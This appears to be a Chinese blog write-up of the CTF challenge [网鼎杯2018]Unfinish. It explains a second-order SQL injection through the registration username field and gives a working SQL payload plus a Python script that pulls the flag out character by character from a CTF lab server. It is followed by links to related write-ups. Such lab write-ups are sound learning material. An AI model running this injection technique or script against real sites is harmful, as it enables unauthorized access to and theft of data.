[网鼎杯2018]Unfinish

最新推荐文章于 2024-08-05 20:41:43 发布
最新推荐文章于 2024-08-05 20:41:43 发布
阅读量394 收藏 2
点赞数
分类专栏: CTF刷题记录 文章标签: Web CTF 二次注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/122817141
版权

[网鼎杯2018]Unfinish

文章目录

二次注入

disearch扫一下,有login.php,还有register.php,对应登录注册功能
推测有二次注入,测试一下

注册时
12345678@qq.com
0'+ascii(substr((select * from flag)from 1 for 1))+'0;
123456

回显
在这里插入图片描述
fuzz的时候,发现, information被过滤了,看师傅们的wp,都是直接猜字段名为flag,然后读取flag

import requests
import re


url = "http://4bd9c0c6-6363-43dc-bb93-416152229cb2.node4.buuoj.cn:81/"
url_login = url + 'login.php'
url_register = url + "register.php"
flag = ''

for i in range(1,50):
    data1 = {#注册
        "email":"3333{}@qq.com".format(i),
        "username":"0'+ascii(substr((select * from flag)from {} for 1))+'0;".format(i),
        "password":"123456"
    }
    data2 = {#登录
        "email":"3333{}@qq.com".format(i),
        "password":"123456"
    }
    ra1 = requests.post(url = url_register,data = data1)
    ra2 = requests.post(url = url_login,data = data2)
    ra1.encoding = "utf-8"
    ra2.encoding = "utf-8"#需要进行编码形式确定
    res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',ra2.text)
    print(res)
    res1 = re.search(r'\d+', res.group())
    print(res1)
    flag = flag+chr(int(res1.group()))
    print(flag)

在这里插入图片描述

Sk1y
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1189
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯 2018 unfinish
feng的博客
10-29 2714
前言 又是一道SQL注入的题目,只能说自己还是太菜。。会的知识太少, WP 进入环境,用dirsearch扫一下,发现有index.php,login.php,register.php。 经过很多的尝试,最终发现这是一个二次注入的题目,注入点是在register.php传入的username中。 接下来就是如何注入了。我一开始考虑报错注入,但是发现不成功。经过尝试,发现过滤了逗号。这就意味了不能进行报错注入,而且不能通过闭合INSERT后面的(A,B,C)来实现注入。 这里我尝试进行union注入,但是过滤
Part_CAE_Unfinish.rar
06-15
在“Part_CAE_Unfinish.rar”这个压缩包中,我们可能找到一系列与UG有限元分析相关的实例教程,这对于初学者来说是极好的学习资源。 在有限元分析中,首先需要对模型进行网格划分,UG提供了多种网格类型,如四面体...
微信小程序 setData 对 data数据影响问题
10-17
uniqueitem: (id == 'unfinish') ? this.data.itemleft[index] : this.data.itemright[index], baninput: (id == 'unfinish')?false:true }); var that = this; wx.getStorage({ key: 'item', success: ...
[网鼎杯2018]Unfinish 数据库注入‘+‘的利用
qq_54929891的博客
05-22 742
试一下万能账号登录1'or'1'='1'#,发现有邮箱格式,1@1’or'1'='1'#结果提示@后面不能有引号,算了去register.php瞅瞅,这种看url一般都有的 随便注册一个登录试试 发现用户名被回显到上面了,看来应该考的是二次注入了(这里注意每测试一次就要注册一个新的邮箱,不然用户名不会更改), 再用1'or'1'='1'#判断一下,结果注册失败!!!%23和-- 都不行可能是被过滤掉了,而且你单独输入一个#又会显示注册成功不知道 但我们输入1'or'1'='1进行前后引号闭合的..
网鼎杯-2018-unfinish解题方法
Lemon_miko的博客
04-27 555
这里我们会发现登录不进去也没有注册界面以及源码,这里我们需要获取它其他的一些界面找注入机会,这里有两种方式找其他界面,一种是猜这里是登录界面那么必定就会有注册界面一般注册界面的名字无非就是reg.php,register.php这是register.php界面当然这种就是靠运气和我们的经验了。在mysql中+只是一个运算符所以我们可以用此方式来获取数据库的ascii码值当然这里也可以使用16进制的方式但要注意的一点是如果hex值过长需要进行截断以及如过算出的hex值是字符会被截断因此需要两次16进制转化。
XCTFunfinish2018网鼎杯)(SQL二次注入
羽的博客
09-14 1099
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 806
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
[网鼎杯2018]Unfinish 两种方法 -----不会编程的崽
不会编程的崽的博客
03-26 1205
网鼎杯 二次注入 盲注
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
Aiwin的博客
05-18 1144
记录BUUCTF [网鼎杯2018]Unfinish1解题思路
SQL注入网鼎杯2018-unfinish
qq_68163788的博客
02-21 1276
SQL注入是一种常见的网络安全漏洞,攻击者利用该漏洞向应用程序的数据库中插入恶意的SQL代码,从而实现对数据库的非法访问或控制。攻击者可以通过SQL注入攻击获取敏感数据、修改数据、删除数据,甚至完全控制数据库
[网鼎杯2018]Unfinish解题,五分钟带你解题
最新发布
m0_69151365的博客
08-05 610
这道题是一道很经典的二次注入题目,回顾解题过程,我们显示登录页面找不到注入点,然后开始扫描目录寻找其他注入点,找到register注册页面,注册完之后登录发现出现了用户名,那我们就考虑注入点是不是在username,开始注入发现结果是0,所以我们就想着用转ascii码等方式来注入,很明显这种方法是正确的,然后information被过滤,我们就尝试用sys来注入表名,但是并没有成功,可能应为不是MySQL所以没有成功,官方也没有放源码出来,所以我们就猜测表名是flag,然后编写python脚本,最后解出
网鼎杯2018:登录页面SQL注入分析
"[网鼎杯 2018]unfinish.md" 这篇描述涉及到的是一个网络安全竞赛中的CTF(Capture The Flag)挑战,特别是关于SQL注入的题目。题目中给出的场景是一个登录页面`/login.php`,并且推测有一个注册页面`/register....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值